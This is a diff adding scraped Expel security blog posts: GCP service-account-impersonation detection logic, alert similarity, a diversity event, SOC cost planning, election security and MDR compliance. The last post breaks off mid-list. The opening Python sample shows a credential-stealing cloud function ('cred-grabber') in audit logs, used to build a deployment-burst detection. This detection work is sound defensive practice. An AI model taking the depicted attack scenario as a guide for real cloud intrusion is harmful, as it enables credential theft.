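            "authenticationInfo": {"principalEmail": "svc-account@project.iam.gserviceaccount.com"},
            "resourceName": "projects/demo/locations/us-east1/functions/cred-grabber",
        }
    })]
    for who, what in cloud_function_deployers(sample):
        print(who, "deployed", what)
```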
Create Now, it\u2019s time to write some detections. Meet Josie, our own python-based detection engine we use here at Expel. Let\u2019s walk through what service account impersonation detection logic looks like for Josie to evaluate. Snippet of Expel detection logic relating to bursts in cloud function deployments At a high level, this logic is watching for any instance of a cloud function deployment, and recording the user responsible for the event. Josie will remember the user responsible for this action for 15 minutes. If the same user deploys over three unique cloud functions in that 15-minute window, Josie will generate an alert for analysts to look into the activity. To make sure this detection logic is sound, we\u2019ll deploy this detection in a draft state to allow us to see how it performs. Based on its performance, we may decide to adjust the detection threshold or suppress users associated with frequent/programmatic cloud function deployments. Once we\u2019ve written a detection and released it into our testing environment, we like to track the detection\u2019s performance in Datadog to measure patterns and general volume. The Datadog visual below makes it pretty obvious to tell which detections needed some work and when they were dialed in. Datadog graph tracking the volume of Expel\u2019s GCP alerts in the testing/development phase After making tweaks to the draft detections to adjust for volume, and ensuring they detect a real threat scenario, we prepare to release the detections into production. Preparing for release means ensuring that the detection has a strong description, suggested triage steps, references and decision support (through the help of our automated robot Ruxie). The goal is to have our analysts set up for success if the detection should trigger an alert. One final thing \u2013 any cowboy can shoot from the hip and come up with novel detection ideas. What\u2019s more challenging is pressure testing the investigative process for those detections. If you can\u2019t investigate it easily, then it\u2019s probably not a good alert to surface up to an analyst. With that said, any good detection should come prepackaged from the detection engineering team with some investigative questions attached to help triage any generated alerts. Appreciate Detections are out, queue the jazz hands. We still like to keep tabs on the newly released detections, however, and have Datadog monitors in place should any of the detections start behaving erratically. In good Scrum fashion, we like to retro our sprint process and look for ways to get better. After iterating upon our detection work and seeking to protect against both new and known threat scenarios, we\u2019re confident in our ability to tackle GCP attacks. Using service account impersonation as a shining example, our coverage for this threat scenario and other kinds of evil in GCP is now significantly stronger. Sprinting ahead When Expel started detection work on GCP, it was a whole new world to explore. Through detection sprints like this one, we can learn how IAM works in GCP (and other cloud platforms), grow our understanding of the attack surface as a team and build up a meaningful detection strategy. This is a reusable process that we\u2019ve found to work well no matter what tech is targeted. 
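To make the output of the Create step concrete, here is a minimal sketch (not Josie's actual implementation) of the burst logic described above: remember each user's cloud function deployments for 15 minutes and alert when a single user deploys more than three unique functions inside that window.

```python
# Minimal sketch (not Josie's actual implementation) of the burst logic above:
# alert when one user deploys more than three unique cloud functions
# within a 15-minute window.
from collections import defaultdict, deque

WINDOW_SECONDS = 15 * 60
UNIQUE_FUNCTION_THRESHOLD = 3

class BurstDetector:
    def __init__(self):
        # user -> deque of (timestamp, function_name) events inside the window
        self.events = defaultdict(deque)

    def observe(self, user, function_name, ts):
        """Record a deployment; return True if this user just crossed the threshold."""
        window = self.events[user]
        window.append((ts, function_name))
        while window and ts - window[0][0] > WINDOW_SECONDS:
            window.popleft()
        unique_functions = {name for _, name in window}
        return len(unique_functions) > UNIQUE_FUNCTION_THRESHOLD

if __name__ == "__main__":
    detector = BurstDetector()
    for i in range(5):  # one user rapidly deploying five distinct functions
        if detector.observe("attacker@project.iam", f"function-{i}", ts=i * 60):
            print(f"ALERT: burst of cloud function deployments (event {i + 1})")
```

A draft detection like this is exactly the kind of thing you would tune against volume data (thresholds, suppressions for known automation) before promoting it to production.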
So if you find yourself in a similar situation (staring down a new area of risk with little detection inspiration to start from), following a similar iterative process of discovery, experimentation and keeping a close eye on your resulting detections should serve you well. As for us \u2013 we\u2019re on to the next one (and we\u2019ll keep sharing along the way)!" +} \ No newline at end of file diff --git a/how-expel-s-alert-similarity-feature-helps-our-customers.json b/how-expel-s-alert-similarity-feature-helps-our-customers.json new file mode 100644 index 0000000000000000000000000000000000000000..368d1b2358d06258e7eee1e6e39c0d3b95b4937f --- /dev/null +++ b/how-expel-s-alert-similarity-feature-helps-our-customers.json @@ -0,0 +1,6 @@ +{ + "title": "How Expel's Alert Similarity feature helps our customers", + "url": "https://expel.com/blog/how-expels-alert-similarity-feature-helps-our-customers/", + "date": "Aug 1, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG How Expel\u2019s Alert Similarity feature helps our customers Security operations \u00b7 4 MIN READ \u00b7 DAN WHALEN AND PETER SILBERMAN \u00b7 AUG 1, 2022 \u00b7 TAGS: MDR / Tech tools Building a security company and a corresponding product suite is a lot like building a house. If the foundational building blocks you\u2019ve created are solid, you should have a sturdy, reliable structure. And if you decide to expand your house in the future, those great foundational building blocks will help you build out faster while maintaining the top-notch structural integrity that you developed in the first place. Since we started our journey at Expel, we\u2019ve believed in this. That\u2019s why we\u2019ve invested in creating processes and tech that ensure our Expletives aren\u2019t burning out as we grow and that our customers don\u2019t see a decline in the level of service they expect. One of the features we recently built and released that helps us do all of this is something we call Alert Similarity. What is Alert Similarity, how did we get the idea for it, and how does it benefit our team of analysts (and, of course, our customers)? How it started Our bots, Josie and Ruxie, process millions of alerts each day, and thousands more show up on our analysts\u2019 screens. Given this volume, it\u2019s no surprise that many look similar to one another. For example, in a given week, our analysts typically review a few hundred alerts related to suspicious logins. If you see enough of this activity, you start to recognize common patterns and similarities (incidentally, humans are pretty good at pattern recognition). So we asked ourselves: Is it possible to teach Josie and Ruxie the same trick? What if we were to think about alerts and their corresponding evidence as documents? Could we compare similar \u201cdocuments\u201d and apply what a human did with one \u201cdocument\u201d and suggest or recommend a next step? Our hunch: comparing alerts to past activity (and corresponding outcomes) can provide valuable situational awareness. Imagine that our analysts identify a security incident on a Monday morning. Chris in accounting fell victim to a phishing attack \u30fc their credentials were stolen and had to be reset. On Thursday night, a different analyst is reviewing a new alert for Alice that looks similar. The situational awareness of what happened a few days ago and what the outcome was helps the analyst make the right decision for Alice\u2019s incident. 
This is a simple example, but here\u2019s where it gets really interesting: Imagine you\u2019re a security provider employing a distributed team of analysts who monitor many different environments, nearly a hundred different security technologies, and respond to many different kinds of activity. The pattern recognition that analysts are innately good at starts to break down with constant context switching \u30fc you can only expect a person to commit and recall so much information. By teaching our bots to recognize and surface similar alerts and their associated outcomes, we can let our analysts focus on what they do best: judgment and relationships. The result? We can improve quality and scale at the same time. This is how our Alert Similarity experiment was born. What is Alert Similarity, anyway? In short, Alert Similarity is a feature of Expel Workbench that helps us make high quality decisions at scale. We accomplish this by applying document similarity techniques to the security alerts we process \u2013 think of this as teaching our bots to recognize patterns and similarities between alerts. As a result, Ruxie can helpfully surface relevant historical context during alert triage, including a recommended action based on the decisions we\u2019ve made for similar activity in the past. Fast forward to today: What started as an experiment quickly turned into a unique and valuable Expel Workbench feature. How Alert Similarity benefits our analysts There are three specific ways that Alert Similarity benefits our team of analysts: #1: Instant suggestions based on past similar alerts One of the biggest benefits of Alert Similarity is that our analysts now receive dynamic suggestions in near-real time about new alerts based on similar alerts that our team has seen previously. Not only does this give our analysts more context when evaluating the right next step to take in an investigation, but it also gives us the benefit of personalizing our response to a specific type of alert in a customer\u2019s environment. For example, a customer might want PUP / PUA alerts categorized as policy violations instead of unwanted software. Our system then automatically learns to treat future, similar alerts as policy violations, automatically \u201csuggesting\u201d this to the analysts who manage that particular customer environment. #2: Enhanced quality control We pride ourselves on being at the forefront of quality control in security operations . This is incredibly important because, as we add new products and offerings, we want our analysts to learn from their mistakes as we scale our business. With Alert Similarity, we can look for clusters of similar alerts and identify when they result in different outcomes. We then push them into our quality control review process, where we review the alerts with a second set of eyes to determine if the correct actions were taken and whether there are any process improvements to be made. #3: New and improved detections With Alert Similarity, we now have a way to compare data we collect from customer environments against historical alerts that we know turned out to be true positive incidents. This capability helps with detection research and engineering. For example, if we compare a new event (or even an event from the past that wasn\u2019t deemed alert-worthy originally) to our known true positives, it can give us the insight we need to determine if we should write additional detections for customer environments. 
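For readers who want a feel for the underlying idea, here is a minimal sketch of alert-as-document similarity using TF-IDF and cosine similarity with scikit-learn. It illustrates the technique, not our production pipeline, and the sample alerts and outcomes are made up:

```python
# Minimal sketch of the document-similarity idea (not the production Alert
# Similarity feature): treat each alert's evidence as a text "document",
# vectorize with TF-IDF, and surface the closest historical alert along with
# the decision an analyst recorded for it.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

# Hypothetical historical alerts and the outcomes analysts recorded for them.
history = [
    ("suspicious login impossible travel okta user chris", "incident: credentials reset"),
    ("pup adware bundled installer endpoint", "policy violation"),
    ("powershell encoded command spawned by word", "incident: malware"),
]

def suggest(new_alert_text):
    """Return the outcome of the most similar past alert and its similarity score."""
    docs = [text for text, _ in history] + [new_alert_text]
    matrix = TfidfVectorizer().fit_transform(docs)
    sims = cosine_similarity(matrix)        # dense (n x n) similarity matrix
    scores = sims[-1, :-1]                  # new alert vs. each historical alert
    best = int(scores.argmax())
    return history[best][1], float(scores[best])

if __name__ == "__main__":
    outcome, score = suggest("suspicious login impossible travel okta user alice")
    print(f"Most similar past outcome: {outcome} (similarity {score:.2f})")
```

In practice the "documents" carry far richer evidence than a one-line summary, but the suggestion surfaced to the analyst works the same way: here is the closest thing we have seen before, and here is what we did about it.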
How it\u2019s going Our Alert Similarity feature launched in February 2022. The feedback we\u2019ve heard from our security operations center (SOC) about it so far is positive and early metrics show that the feature is working the way we\u2019d hoped \u2013 it\u2019s offering our analysts valuable suggestions about new alerts in the moment they\u2019re being reviewed, and it\u2019s saving our team time as they make decisions about the right next steps in an investigation. Take a look at our first read-out: We\u2019re also sharing some of these same metrics with our executive leadership team and board. Interested in creating your own version of Alert Similarity? In just a few months, our analysts \u2013 and in turn, our customers \u2013 are already benefiting from the introduction of Alert Similarity. That doesn\u2019t mean we\u2019re done. In fact, we\u2019re continuing to work on ways of improving the feature and using similar techniques to drive other features and use cases. Want to learn more about exactly how we built and tested Alert Similarity, and get some tips on how you might be able to develop something similar to benefit your own SOC? You\u2019re in luck \u2013 we created a technical walk-through." +} \ No newline at end of file diff --git a/how-expel-s-bold-erg-celebrated-black-contributions-to.json b/how-expel-s-bold-erg-celebrated-black-contributions-to.json new file mode 100644 index 0000000000000000000000000000000000000000..a2bb100ad4bd8423bda1c40a8a872b710df9966f --- /dev/null +++ b/how-expel-s-bold-erg-celebrated-black-contributions-to.json @@ -0,0 +1,6 @@ +{ + "title": "How Expel's BOLD ERG celebrated Black contributions to ...", + "url": "https://expel.com/blog/how-expels-bold-erg-celebrated-black-contributions-to-music-for-black-history-month/", + "date": "Mar 8, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG How Expel\u2019s BOLD ERG celebrated Black contributions to music for Black History Month Expel insider \u00b7 2 MIN READ \u00b7 NEIKO LAMPKIN \u00b7 MAR 8, 2023 \u00b7 TAGS: Careers / Company news The cybersecurity industry has an unfortunate reputation for lacking diversity. But we at Expel are out to change that, because we know we\u2019re better when different. We like to say that we\u2019re a stronger organization when we recognize, celebrate and learn from those whose backgrounds and perspectives are different from our own. To support that focus on diversity, Expel has a number of employee resource groups (ERGs) that nurture and bolster various communities of Expletives and their allies. These include WE (Women of Expel), The Treehouse (LGBTQ+ Expletives), The Connection (a community of Expletives focused on mental wellbeing), and BOLD (Black Opportunities for Learning and Development). Our BOLD ERG was excited to honor Black History Month in a particularly BOLD fashion (see what we did there?). Heading into February, we thought about the many things that bring the Black community together and showcase its beauty, which helped us identify the perfect vessel for education: music. From there, we determined our Black History Month 2023 theme would be An Introduction to Black Art through Music. Throughout February, our BOLD community shared weekly Slack posts that educated our people on the impact of Black music throughout the world. These posts explored genres such as ragtime, blues, gospel, jazz, R&B, hip-hop, and reggaeton. These posts also painted a timeline that acknowledged music as one of the few possessions slaves brought with them to the Americas. 
But the celebration didn\u2019t stop there. To further connect to our theme, we brought the education to life by hosting a live performance at Expel\u2019s interdimensional HQ by genre-bending Washington, D.C.-based duo April + VISTA . The performance was filled with lush, multidimensional sounds as the duo guided us through ancestral reflections through song. The performance was accompanied with a lunch from Maker\u2019s Union Pub for the People and sound equipment was provided by Zoney Sound \u2014both Black-owned businesses\u2014enabling us to lean into an all-around celebration of Blackness. Still stunned by April + VISTA\u2019s performance, our journey then took us to the heart of Miami for our first-ever company kickoff (CKO), which brought together more than 400 Expletives to meet, learn, and plan for the year ahead. Miami is known for its warm weather, great food, beautiful beaches, and most importantly its rich and vibrant culture. We knew Miami would provide a great backdrop to further explore Black impact and influence. To emphasize this, we brought in Miami-based, Ghana-born artist Nii Tei to DJ our welcome reception. Nii\u2019s set seamlessly blended house-, electronic, and disco-inspired sounds with African influences, creating a soundscape that reflected Black creativity and expression. Having most Expletives in one place for CKO also presented an ideal opportunity for additional education about Black history in Miami, so our BOLD community collaborated to create an exhibit that highlighted the Black historical context of the city. The exhibit acknowledged the Black impact on places like Overtown (formerly known as Colored Town), as well as Little Havana\u2014a place many Cuban Americans call home and has now expanded to include a large population of people from other parts of the Caribbean and Central America. We recognized iconic places like Little Haiti that boast rich French\u2013Creole culture and also highlighted how important the Jewish community\u2019s alliance with Black racial equality activists in the late 1950s supported desegregation efforts. Wow\u2026what a month! And to add on to our celebration of Black impact, our Women of Expel (WE) and Treehouse ERGs shared their support by highlighting the intersectionality among our communities recognizing Black women and LGBTQ+ trail blazers such as Bell Hooks, Alice Ball, Marsha P. Johnson, and Gladys Bentley. As we carry the celebratory spirit into Women\u2019s History Month, we\u2019re excited for continued programming and educational opportunities. We encourage you to check out our equity, inclusion, and diversity (EID) page to learn more about our ERGs and our approach to EID." +} \ No newline at end of file diff --git a/how-much-does-it-cost-to-build-a-24x7-soc.json b/how-much-does-it-cost-to-build-a-24x7-soc.json new file mode 100644 index 0000000000000000000000000000000000000000..2d8df17016df71a741c3bb0a886e34cdfec85590 --- /dev/null +++ b/how-much-does-it-cost-to-build-a-24x7-soc.json @@ -0,0 +1,6 @@ +{ + "title": "How much does it cost to build a 24x7 SOC?", + "url": "https://expel.com/blog/how-much-does-it-cost-to-build-a-24x7-soc/", + "date": "Feb 28, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG How much does it cost to build a 24\u00d77 SOC? Security operations \u00b7 8 MIN READ \u00b7 YANEK KORFF \u00b7 FEB 28, 2018 \u00b7 TAGS: How to / Planning / SOC The phone rings. It\u2019s your boss. \u201cHow much is it going to cost us to take our SOC to 24\u00d77?!\u201d It sounds urgent. 
It turns out he\u2019s calling because he just saw someone tweet about a data breach at one of your competitors. You\u2019re tempted to throw out \u201ca million dollars\u201d as an estimate. It seems as good a place to start as anywhere. But is it? After all, the costs of building and operating a 24\u00d77 security operations function can vary greatly. One of the biggest factors impacting cost is how \u201cgood\u201d you want to be. Do you need an excellent security operations center (SOC)? Or just one that\u2019s good enough? Or maybe something in-between? Turns out there\u2019s a \u201cfloor\u201d cost that you\u2019re unlikely to go under if you\u2019re shooting for \u201ccompetent.\u201d Beyond that, the sky\u2019s the limit. Let\u2019s take a look at how we get to a right-sized answer that fits your particular situation. Night of the roundtable: adjectives matter when you build a SOC It\u2019s tempting to whip out the calculator and start adding up the dollars, but not all SOCs are built alike. Are you building something basic? Advanced? What do these adjectives even mean? A few years ago, our CEO was hosting a roundtable dinner with a room full of fellow CEOs. The topic was cybersecurity operations and the CEOs felt strongly that they needed to up their game. What they were doing just wasn\u2019t good enough. It was time to push the pendulum to \u201cstate of the art.\u201d What exactly does that look like, and what\u2019s the price tag? Let\u2019s look at the spectrum of what a SOC might do. Security Operations Center (SOC) Capabilities Whew. That\u2019s quite a lot of capability and it begins to represent what a state-of-the-art SOC entails. Add all of that up and depending on how big your organization is, a SOC could cost anywhere from a few million dollars to half a billion 1 (or heck, even unlimited 2 ). Now, back to that CEO roundtable. After the whole state-of-the-art discussion, one of the CEOs in the back of the room raised her hand, \u201cConsidering we\u2019re not a big bank, what\u2019s good enough and how much does that cost?\u201d The SOC cost breakdown consists of several elements. Frankly, the foundational investments for \u201cgood enough\u201d aren\u2019t any different than \u201cstate-of-the-art.\u201d You\u2019ll need people. While there are seemingly endless shift schedules to choose from, our experience in building 24\u00d77 security teams tells us that the minimum number of people you\u2019ll want operating in a SOC is 12. You could probably get by with eight, but vacations and illness will result in individuals being stranded alone on shift. Considering even entry-level security analysts command $75,000/year in salary alone, your cost to operate a SOC starts at roughly a million dollars. Beyond people, the next largest impact on your SOC\u2019s efficacy will be your technology and how easy you can make it for your people to use. Any SOC that doesn\u2019t have the right technology to provide visibility, detection, and investigative capabilities will end up being pretty useless, regardless of how many people you throw at it. While the technology bill at smaller organizations will only be a fraction of the staffing costs, as an organization grows, those tech costs can really skyrocket. Now that we have a sense of our base costs, let\u2019s imagine four possible security operations centers. These examples map relatively well to examples we\u2019ve seen in the field\u2013both at customers and at service providers. 1. 
The basic SOC This SOC focuses primarily on detection (but not so much on investigation). They\u2019ve invested sparingly in technology and have an odd assortment of visibility, partially due to investments the last CISO made and partially due to the current limited budget. Analysts work primarily in a SIEM that was deployed several years ago and it just hasn\u2019t been kept up to date. Overall, these technologies offer decent detection capability but there\u2019s not much flexibility to tune how they work with additional intelligence or use them for more advanced investigative use cases. Spending time doing investigations or engaging in \u201chunting\u201d isn\u2019t really in the cards at all. There hasn\u2019t been a major incident, but the current CISO worries: if there were, would his SOC find it? 2. The intermediate SOC At this level, the SOC has mastered detection and the technology investments provide reasonably good visibility into the organization\u2019s nooks and crannies. Beyond the basic detection capability of a SIEM fed by event logs, the SOC has deployed a combination of EDR and network forensics technologies that provide advanced threat detection. Security analysts operate at multiple tiers; some of the more senior practitioners frequently leave the SIEM to take advantage of unique capabilities their advanced tech offers. The team really wants to spend more time being proactive, but \u201coperational reality\u201d makes that difficult. SOC management oscillates on a day-by-day basis: some days they\u2019re confident about the capabilities of their SOC, and other days they feel blind and they worry there\u2019s stuff on the network they don\u2019t know about. 3. The advanced SOC SOCs that get to this level have made a tremendous investment in tooling to free up their analysts\u2019 time. Tier one and two analysts are working primarily in a SIEM. But that\u2019s only because they\u2019ve taken the time (along with a good dose of help from outsiders) to tune their correlation rules and plug some of their more specialized products into the SIEM. They can even pull data from their network and endpoint security products without leaving the SIEM. This improves the quality (and speed) of their investigations. When they escalate incidents, tier three analysts pick them up and pivot directly to more sophisticated analysis tools and consoles. While good things come in threes, advanced SOCs often add a fourth cadre of analysts called the \u201chunt\u201d team. They\u2019re not part of the 24\u00d77 rotation. They focus exclusively on finding things their tech missed. While they do a little work in the SIEM, they spend most of their time building and running custom scripts to find threats their security products aren\u2019t alerting on. Lastly, there are a couple of groups helping to make all of the underlying tech runs. Intelligence analysts make sure that the intel feeding the technology is up to date, ensure it\u2019s not burying shift analysts in useless alerts, and\u2013when serious threats arise\u2013add color and context so that management understands the risks they\u2019re facing. Finally, you\u2019ll see engineers whose job is to build software that makes their security products talk to each other. This helps streamline their processes and automate data gathering as best as they can. For lack of a better term at this organization, they call themselves SOC plumbers. 
The CISO in the advanced SOC is comfortable with her security operation and periodically brings in third parties to run red team exercises to ensure the SOC is performing as she\u2019d expect. 4. The learning SOC Like the advanced SOC, this organization has invested an enormous amount of time and money in automation and analytics. They\u2019re focused on ensuring that humans are doing the security work that only humans can do. Everything else is handled by software. To that end, they\u2019ve tied their security technologies together with an orchestration framework and pulled in resources from IT to help automate investigation and remediation. As a metrics-driven organization, they watch closely what the ratios are between false positives and true positives, how long it takes to triage and investigate, and how much value they\u2019re getting out of their security investments based on usage. These metrics drive a constant stream of change back into the infrastructure because the tuning is never done. A note of caution here: just because you have metrics doesn\u2019t mean you\u2019re operating at this level. They\u2019re a necessary but not sufficient condition. Every time the CISO brings in a red team (he rotates between three vendors) he reviews the metrics to ensure time-to-detect, time-to-respond and the overall accuracy that\u2019s coming out of his SOC is improving. There\u2019s still no guarantee his organization\u2019s \u201csecure,\u201d but he feels prepared to respond should anyone get in. Picking the SOC that\u2019s right for you What SOC is right for you? Perhaps it\u2019s one of the examples above. Or, maybe it\u2019s something in between. Only you can determine what\u2019s right for your organization, but Expel might be able to assist you in choosing what\u2019s right for your organization. We\u2019ve found that the best way to figure out how much \u201csecurity\u201d you need to put in place is by looking at things through the lens of risk, specifically through a framework. It probably doesn\u2019t matter which one, but starting with the end in mind is better than going YOLO . I know. It sounds kinda boring. It would be a lot more fun to go buy and implement a bunch of whizz-bang security tech. We see this a lot. But we also see these organizations paying a price in the end. A few years down the road their whizz-bang security tools are gathering dust and their people are overwhelmed with useless alerts. If you\u2019re willing to take this more step-by-step approach, we recommend NIST\u2019s Cybersecurity Framework . It\u2019s not the only one you can use, but it breaks down security practices into five simple functions: identify, protect, detect, respond, and recover. It also encompasses a whole lot more than what goes into a SOC, which makes it even more useful. That said, if you\u2019re focused on SOC operations, you\u2019ll find your best guidance within detect and respond with a few relevant nuggets in identify . We\u2019ll be providing a lot more guidance about this framework on the EXE blog soon, but for now, the important thing to know is that your level of \u201crigor and sophistication\u201d doesn\u2019t need to be at level 4 across the board. It\u2019s more like building out your D&D character. You\u2019re essentially allocating a limited set of points across charisma, agility, and strength. Adding it all up After you\u2019ve determined the kind of risks you want to manage and mitigate, you\u2019ll have a better notion of the kind of SOC you need to build. 
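As a back-of-the-envelope illustration of the staffing math above (a 12-person rotation at roughly $75,000 per entry-level analyst), here is the arithmetic; the overhead multiplier is an assumption for illustration, not an Expel figure:

```python
# Back-of-the-envelope staffing math for a 24x7 SOC, using the figures above:
# a 12-person minimum shift rotation and ~$75,000 base salary per entry-level
# analyst. The benefits/overhead multiplier is an assumption.
ANALYSTS = 12
BASE_SALARY = 75_000
OVERHEAD_MULTIPLIER = 1.3   # assumed loading for benefits, taxes, tooling seats, etc.

salary_only = ANALYSTS * BASE_SALARY
fully_loaded = salary_only * OVERHEAD_MULTIPLIER

print(f"Salary only:  ${salary_only:,.0f} / year")    # $900,000
print(f"Fully loaded: ${fully_loaded:,.0f} / year")   # ~$1,170,000, roughly the million-dollar floor
```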
Below, we\u2019ve outlined a rough estimate for purchasing SOC technology and staffing the team. Because technology 3 costs can vary significantly based on the size of the organization, we\u2019re imagining an organization with about 5,000 employees. Bear in mind that at larger organizations, the costs of technology can increase dramatically. Sample costs for SOC-related tools, staffing, and implementation Based on an organization of 5,000 employees That\u2019s a wrap Understanding the true costs of building and operating a SOC has more to do with the capability you\u2019d like to field than the people you need to hire to run 24\u00d77. Hopefully, this post has helped you estimate a little better what kind of SOC you\u2019d like to build and how much that might cost. And look, if you\u2019re sitting here thinking \u201coh man, this isn\u2019t the kind of money I want to be spending. Security\u2019s not a core part of my business, and there\u2019s no way we\u2019re going to become experts at it,\u201d well, a great many people end up at that same conclusion. In that case, it might be worth considering outsourcing your security operations center and going with SOC as-a-service model . I\u2019ll leave you with a parting thought. If you do decide that building your own SOC capability is a bridge too far, consider when you\u2019re outsourcing what exactly your SOC provider is bringing to the table. Is it basic or advanced? Just the hunting use case? There are infinite ways in which these capabilities can be carved up, and the better you understand what capabilities you need, the better equipped you\u2019ll be to build them or buy them. 1: Forbes \u201cWhy J.P. Morgan Chase & Co. Is Spending A Half Billion Dollars On Cybersecurity,\u201d 30 Jan 2016 https://www.forbes.com/sites/stevemorgan/2016/01/30/why-j-p-morgan-chase-co-is-spending-a-half-billion-dollars-on-cybersecurity/?sh=3c58f0f02599 2: Forbes \u201cBank of America\u2019s Unlimited Cybersecurity Budget Sums Up Spending Plans In A War Against Hackers,\u201d 27 Jan 2016 https://www.forbes.com/sites/stevemorgan/2016/01/27/bank-of-americas-unlimited-cybersecurity-budget-sums-up-spending-plans-in-a-war-against-hackers/?sh=6ab120a264cd 3: We\u2019re focusing on SOC-specific tools, not the bread-and-butter security investments organizations make for things like basic firewalls, identity and access management, patch management, vulnerability management, and the like." +} \ No newline at end of file diff --git a/how-public-private-partnerships-can-support-election-security.json b/how-public-private-partnerships-can-support-election-security.json new file mode 100644 index 0000000000000000000000000000000000000000..fbd672f9b737072a79021b894e64416191acbc57 --- /dev/null +++ b/how-public-private-partnerships-can-support-election-security.json @@ -0,0 +1,6 @@ +{ + "title": "How public-private partnerships can support election security", + "url": "https://expel.com/blog/how-public-private-partnerships-can-support-election-security/", + "date": "Mar 14, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How public-private partnerships can support election security Tips \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 MAR 14, 2019 \u00b7 TAGS: Cloud security / Managed security / Planning / Vulnerability Bruce Potter is our CISO here at Expel. In his past life, he served as the senior technical advisor to the members of President Obama\u2019s Commission on Enhancing National Cyber Security. 
It\u2019s only March but it feels like November 2020 is right around the corner. In case you\u2019ve been living under a rock, election security is a hot topic leading up to the next national election \u2014 every day there\u2019s a new headline about how to improve election technology or get rid of it altogether or how to stop threat actors from meddling in U.S. elections . Between security at the ballot box, concerns around central voting databases, issues with third-party data aggregators and information operations on social media, there\u2019s a lot to keep tabs on. Many of the potential answers to the \u201cWhat should we do about it?\u201d question falls into the public policy realm. Various national, state and local agencies are responsible for addressing some of these issues. The integrity of voter registration databases is largely a state and local government concern. As much as private industry may have opinions on how to properly secure these systems, it is ultimately the job of dedicated civil servants to decide what to protect and how to do it. That begs the question \u2026 What can and should the private sector do? And specifically, how and why should private sector security organizations be involved? Cybersecurity companies have an incredible capability to know the nitty gritty details of malware and malicious activities that are happening inside our customers\u2019 networks and systems every single day. These companies are the ones that are on the front lines when it comes to defending businesses against attacks ranging from commodity malware to highly targeted state actors. While the U.S. government does its part when it comes to protecting our democracy and could do even more, the reality is that many citizens look to the government for help in times of crisis but want the government to be involved in as little as possible on a regular basis. I\u2019ve done a fair bit of contract work with the government that had the potential to positively impact the private sector, but there were often hurdles outside each respective agency\u2019s control that stalled or complicated each project. First \u2014 which is sometimes the case for cybersecurity in general \u2014 there are various spheres of authority that get in the way of productive outreach. National Security Agency (NSA) has lots of great ideas but is in general only responsible for the protection of classified systems. Defense Advanced Research Projects Agency (DARPA) and Department of Defense (DoD) have \u201cdefense\u201d in their names, so you know what their focus is. And Department of Homeland Security (DHS) often is focused on critical infrastructure but not on the protecting citizens at large. With no single agency leading the charge on all things cybersecurity, it\u2019s difficult to find a point person to conduct public outreach. Second, and more the purview of the private sector, is the concern that when the government shows up and says, \u201cWe\u2019re from the government, we\u2019re here to help,\u201d our natural inclination is to be incredibly skeptical. It can be difficult to accept assistance and outreach from a government agency when there\u2019s no overt problem to contend with. However, without ongoing involvement that starts long before there\u2019s ever a problem, it\u2019s difficult if not impossible for the government and private sector to collectively be effective when there\u2019s an issue. Private industry is an essential part of our national defense when it comes to cybersecurity. 
The stronger the security of private industry organizations and their service providers is, the better the security of our nation. We\u2019ve recognized that in formal policy already through the Clinton-era Critical Infrastructure definitions . It\u2019s time we think about how private industry can participate in protecting our democracy through future election cycles. Imagine a public-private partnership \u2014 yes, this is an overused phrase and even a \u201cdirty word\u201d in some circles \u2014 between U.S. government entities \u201cin the know\u201d and cybersecurity companies that have visibility into global networks with the specific purpose of sharing information around election integrity. While there are pockets of sharing outside of critical infrastructure verticals (sometimes through MOUs, other times through a simple handshake), there is no comprehensive program in place to share information about election security with a broad set of private sector partners. What advantage would this type of program have? First off, managed security service providers (MSSPs) and endpoint detection and response (EDR) companies have an incredible view into the global operations of businesses across many industries, and a deep understanding of the security concerns and threats they face each day. If the U.S. government would share the tactics, techniques and procedures of know election threat actors, private sector cybersecurity firms could develop custom detection rules to find these actors within the global networks we have visibility into already. Then, working with our customers, we could quickly share information with the government to inform their operations and help stop attacks against our election systems. Further, this sort of partnership will shed light into the darkness. The more that private sector entities become engaged in this problem, the fewer places the adversaries have to hide. While we know some of what has transpired in social media, little of that has been shared with the public and the data has largely been confined to a few large tech companies. Involving a broad group of cybersecurity organizations in these activities will help demystify malicious activities that target not just U.S. elections but those around the globe. Of course, this type of partnership doesn\u2019t come without risk. Cybersecurity companies are often third parties to the data they oversee \u2014 the data is actually owned by their customers and can\u2019t be shared without explicit permission. In order to be successful, this type of program would have to be well socialized in advance in order to get buy in not just from the cybersecurity companies but from the organizations they support. Which means that if a program like this were to exist, the gears need to be turning now in order to have an impact on 2020 elections. Private sector cybersecurity companies can do far more than just writing blog posts about election security or shaking their collective fists at the cloud. By pulling more private sector partners into the fight against election meddling, the U.S. government can multiply the impact of the knowledge it already has about election threat actors. And by including a broad set of companies \u2014 not just a few large companies \u2014 we can collectively see into more dark corners and find more malicious activity than would otherwise be possible. We\u2019d also be spreading knowledge of our actions farther and wider, giving a sense of real progress and security to the public at large. 
At the end of the day, that\u2019s exactly what our citizens and our national election systems deserve." +} \ No newline at end of file diff --git a/how-should-my-mdr-provider-support-my-compliance-goals.json b/how-should-my-mdr-provider-support-my-compliance-goals.json new file mode 100644 index 0000000000000000000000000000000000000000..763fb5bdccf08c2ccf3584aa94a2b4a064228b76 --- /dev/null +++ b/how-should-my-mdr-provider-support-my-compliance-goals.json @@ -0,0 +1,6 @@ +{ + "title": "How should my MDR provider support my compliance goals?", + "url": "https://expel.com/blog/how-should-mdr-provider-support-compliance-goals/", + "date": "Jul 20, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG How should my MDR provider support my compliance goals? Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 JUL 20, 2021 \u00b7 TAGS: MDR So someone told you that you need to make sure your tech, privacy and security policies are \u201ccompliant.\u201d And that you need your managed detection and response (MDR) provider to support your compliance program. But what does that mean in practice? There are things you need to do to make sure your tech and data are secure and following security best practices. You\u2019ve done those things, and you\u2019ve checked your work so that if anyone wants to verify you\u2019re doing the right things, you can confidently say you\u2019ve done your due diligence. That\u2019s really what\u2019s at the core of any compliance initiative, regardless if it\u2019s regulatory compliance, industry compliance or just adhering to internal policies. Any good MDR provider should support you in those efforts (we\u2019ll get into how they should specifically do that in a moment). You don\u2019t need your security provider to be a compliance liability. What types of compliance impact a security program? Compliance comes in all shapes and sizes. For example, your boss or your board of directors might ask you to make sure your security program is compliant with: Internal company policies Industry regulations Standards 